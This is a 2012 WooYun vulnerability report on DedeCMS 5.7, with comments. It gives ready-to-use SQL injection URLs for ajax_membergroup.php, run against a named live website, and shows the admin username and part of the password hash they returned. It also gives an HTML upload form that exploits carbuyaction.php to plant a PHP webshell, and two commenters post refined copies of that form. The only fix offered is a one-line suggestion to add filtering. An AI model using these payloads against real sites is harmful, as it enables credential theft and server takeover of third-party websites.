当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06577

漏洞标题:织梦5.7注入加上传漏洞

相关厂商:织梦5.7注入加上传漏洞

漏洞作者: 神倦懒言

提交时间:2012-05-03 12:14

修复时间:2012-05-03 12:14

公开时间:2012-05-03 12:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-05-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

会员中心查询会员信息语句过滤不严,导致url可提交注入参数;
会员中心有上传动作过滤不严,导致上传漏洞

详细说明:

①注入漏洞。
这站 http://www.30tianlong.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
然后写上语句
查看管理员帐号
http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin
查看管理员密码
 http://www.30tianlong.com//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
查看管理员密码
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
8d2
9b1ef9f8c5a5af42
9
cmd5没解出来 只好测试第二个方法
②上传漏洞:
只要登陆会员中心,然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
<form action="=../dialog/select_soft_post]
<[/url">http://www.yunsec.net/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
即可上传成功

漏洞证明:

修复方案:

上述两处增加过滤

版权声明:转载请注明来源 神倦懒言@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2012-05-03 14:45 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    <form action="" method="post" enctype="multipart/form-data" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"><input type="text" value="http://localhost/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" name="doaction" style="width:800"><br />file:<input name="uploadfile" type="file" /><br>newname:<input name="newname" type="text" value="myfile.Php"/><input type="submit" value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>

  2. 2012-05-03 14:52 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    <form action="http://127.0.0.1/dede/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"enctype="multipart/form-data" name="form1">file:<input name="uploadfile" type="file" /><br>newname:<input name="newname" type="text" value="myfile.Php"/><button class="button2" type="submit">提交</button><br><br>

  3. 2012-05-03 15:57 | 北北 ( 路人 | Rank:25 漏洞数:5 | 广告位招租。有阿里、万网的漏洞私信给我有...)

    。。。。。

  4. 2013-05-13 13:07 | 纠结师 ( 实习白帽子 | Rank:53 漏洞数:12 | 传说中的废材)

    貌似上传很好用的样子

  5. 2015-05-09 15:16 | 吗丁啉 ( 路人 | Rank:12 漏洞数:1 | 最后的Delphier...)

    图在哪, 复制粘贴的一通居然也给过le ?